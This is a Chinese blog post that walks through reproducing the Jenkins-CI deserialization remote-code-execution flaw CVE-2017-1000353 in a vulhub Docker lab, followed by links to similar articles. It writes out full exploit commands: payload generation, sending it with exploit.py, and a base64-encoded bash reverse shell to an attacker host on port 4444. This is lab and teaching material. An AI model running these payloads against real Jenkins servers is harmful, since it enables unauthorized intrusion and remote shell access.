Jenkins-CI 远程代码执行漏洞(CVE-2017-1000353)

最新推荐文章于 2024-07-27 13:25:11 发布
最新推荐文章于 2024-07-27 13:25:11 发布
阅读量751 收藏 12
点赞数 25
文章标签: jenkins linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65354386/article/details/140200627
版权

实验目的

1、能成功搭建漏洞测试与测试工具所需的运行环境

2、能成功利用漏洞原理测试复现漏洞

实验环境

1、VMware Workstation 16

2、kali

3、vulhub靶场

使用场景

Jenkins 可以自动执行代码构建、编译、打包以及单元测试、集成测试等,确保代码质量,还拥有丰富的插件库,能够集成各种工具和服务,且支持自动化部署应用到测试或生产环境。

业务能力

Jenkins 提供详细的构建日志和报告,通过自动化构建和测试,能够为开发团队提供了高效的持续集成和持续部署解决方案,同时促进敏捷开发和 DevOps 实践的落地。

实验步骤

漏洞环境使用vulhub搭建,漏洞目录为 vulhub/jenkins/CVE-2017-1000353

执行如下命令启动jenkins 2.46.1:docker-compose up -d

查看靶场端口:docker ps

完全启动成功后,访问http://your-ip:8080即可看到jenkins已成功运行

创建文件 docker环境测试

依赖工具下载连接:

exploit.py :CVE-2017-1000353/exploit.py at master · vulhub/CVE-2017-1000353 · GitHub

CVE-2017-1000353-SNAPSHOT-all.jar:
https://github.com/vulhub/CVE-2017-1000353/releases/download/1.1/CVE-2017-1000353-1.1-SNAPSHOT-all.jar

 

生成序列化字符串 jenkins_poc.ser

java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"

如果在这步中出现如下warning,则说明java版本过高,可以自行安装并切换为jdk1.8版本

将刚才生成的字节码文件发送给目标:python exploit.py http://your-ip:8080 jenkins_poc.ser

进入容器,命令:docker-compose exec jenkins bash

可以看到/tmp/success成功被创建,说明命令执行漏洞利用成功

反弹shell在线靶场测试

#bash反弹命令

bash -i >& /dev/tcp/kali-ip /4444 0>&1

将命令进行base64编码得到base64编码值:

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE1MC4xNDQvNDQ0NCAwPiYx

打开监听:

生成序列化字符串,即jenkins_poc.ser文件:

java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE1MC4xNDQvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}"

使用 exploit.py 发送 jenkins_poc.ser 至 Jenkins:

python3 exploit.py http://192.168.150.144:8080 jenkins_poc.ser

查看监听端口可以看到反弹成功

复现完记得关闭容器:docker-compose down

火爆的后槽牙-
关注
Jenkins-CI 远程代码执行漏洞复现(CVE-2017-1000353
墨痕诉清风的博客
11-06 841
(https://github.com/vulhub/CVE-2017-1000353/releases/download/1.1/CVE-2017-1000353-1.1-SNAPSHOT-all.jar),这是生成POC的工具。下载[exploit.py](https://github.com/vulhub/CVE-2017-1000353/blob/master/exploit.py)参考阅读 https://blogs.securiteam.com/index.php/archives/3171。.
[CVE-2017-1000353]Jenkins-CI 远程代码执行漏洞
https://www.cnblogs.com/zpchcbd/
09-21 490
vulhub环境搭建: cd /root/vulhub/jenkins/CVE-2017-1000353 docker-compose up -d 访问网址 http://120.79.66.58:8080/ 漏洞复现: 1、先下载CVE-2017-1000353-1.1-SNAPSHOT-all.jar来生成相应利用的poc java -jar CVE-2017-1000353-1.1-S...
【渗透测试】Jenkins远程命令执行漏洞CVE-2018-1000861)
最新发布
网络安全从业者的学习笔记
07-27 476
Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。 通过这个漏洞,我们可以找到很多可供利用的利用链。其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令:Jenkins在沙盒中执行Groovy前会先检查脚本是否有错误,检查操作是没有沙盒的,攻击者可以通过Meta-Programming的方式,在检查这个步骤时执行任意命令。
漏洞分析|死磕Jenkins漏洞回显与利用效果
m0_46699477的博客
06-28 1323
本文以 Jenkins 反序列化漏洞作为优化案例,分享我们的解决漏洞问题的方式。
Jenkins远程命令执行漏洞 CVE-2018-1000861 漏洞复现
ADummy的博客
03-04 566
Jenkins远程命令执行漏洞CVE-2018-1000861) by ADummy 0x00利用路线 ​ 直接url执行 0x01漏洞介绍 ​ Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。 通过这个漏洞,我们可以找到很多可供利用的利用链。其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令:Jenkins在沙盒中执行Groovy前会先检查脚本是
Jenkins远程代码执行漏洞检查(CVE-2017-1000353
weixin_30675247的博客
05-05 240
Jenkins的反序列化漏洞,攻击者使用该漏洞可以在被攻击服务器执行任意代码漏洞利用不需要任何的权限 漏洞影响范围: 所有Jenkins主版本均受到影响(包括<=2.56版本)所有Jenkins LTS 均受到影响( 包括<=2.46.1版本) 测试步骤: 1.下载生成反序列的payload: https://github.com/nobleXu/jenkins 2.生成...
漏洞复现】Jenkins-CI远程代码执行漏洞(CVE-2017-1000353
weixin_43486390的博客
12-18 934
0x01 漏洞描述 Jenkins存在未经身份验证的远程代码执行漏洞,经过序列化的Java SignedObject对象传输到基于远程处理的Jenkins CLI,在使用新的对象ObjectInputStream对其进行反序列化操作即可绕过现有的基于黑名单的保护机制。远程攻击者可利用漏洞在受影响的应用程序的上下文中执行任意代码,或造成程序拒绝服务。 0x02 影响范围 所有Jenkins主版本均受到影响(包括<=2.56版本) 所有Jenkins LTS 均受到影响( 包括<=2.46.1
Jenkins远程命令执行漏洞(CVE-2018-1000861)
玄道的网安博客
06-06 5575
1. 漏洞简介 Jenkins 是常见的CI/CD服务器, 最常见的就是爆破弱口令然后使用groovy执行命令 2. 影响组件 Jenkins 3. 漏洞指纹 Jenkins 4. Fofa Dork app="Jenkins" 5. 漏洞分析 这里我们是用docker快速搭建 git clone https://github.com/vulhub/vulhub.git cd /root/vulhub/jenkins/CVE-2018-1000861 docker-compose
利用Vulnhub复现漏洞 - Jenkins-CI 远程代码执行漏洞CVE-2017-1000353
JiangBuLiu的博客
07-11 2276
Jenkins-CI 远程代码执行漏洞CVE-2017-1000353)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现生成序列化字符串发送数据包,执行命令检验 Vulnhub官方复现教程 https://vulhub.org/#/environments/jenkins/CVE-2017-1000353/ 漏洞原理 参考阅读 https://blogs.securiteam.com/...
漏洞复现—Jenkins反序列化漏洞CVE-2017-100035/ CVE-2018-1000861
weixin_45556536的博客
11-17 761
Jenkins反序列化漏洞利用CVE-2017-1000353基础知识漏洞原理影响版本复现思路复现—CVE-2018-10008611、特征检测 基础知识   序列化就是把对象转换成字节流,便于保存在内存、文件、数据库中;反序列化即逆过程,由字节流还原成对象。   Java中的ObjectOutputStream类的writeObject()方法可以实现序列化,ObjectInputStream类的readObject()方法用于反序列化。   形成漏洞的根源在于类ObjectInputStream在反序列
代码层面分析Jenkins未授权访问CVE-2017-1000353
stopys6的博客
09-13 230
/通过上面的ReaderThread.start()方法启动一个线程,ReaderThread为SynchronousCommandTransport类的内部类,在run()方法中,调用ClassicCommandTransport类的read()方法读取输入,read()方法实际是调用Command类的readFrom()方法读取,通过反序列化输入返回一个Command对象。在 run() 方法中,使用一个循环来读取通道中的命令,直到通道被关闭为止。
Jenkins反序列化漏洞cve-2017-1000353
weixin_30593443的博客
12-13 429
一、漏洞原理: 本地没有环境:参考:https://blogs.securiteam.com/index.php/archives/3171 进行学习理解记录。 首先这是一个java反序列化漏洞,一定是command在序列化信息中,反序列化时候直接执行了该命令。 攻击过程学习: 下文的session是一个uuid,类型4 1 #可以如下生成 2 session = uuid....
jenkins java反序列化_Jenkins Java 反序列化远程执行代码漏洞(CVE-2017-1000353)
weixin_31308407的博客
02-13 205
Jenkins Java 反序列化远程执行代码漏洞(CVE-2017-1000353)一、漏洞描述该漏洞存在于使用HTTP协议的双向通信通道的具体实现代码中,jenkins利用此通道来接收命令,恶意攻击者可以构造恶意攻击参数远程执行命令,从而获取系统权限,造成数据泄露。二、漏洞影响版本所有jenkins主版本均受到影响(包括<=2.56版本)所有的jenkins LTS均受到影响(包括&lt...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值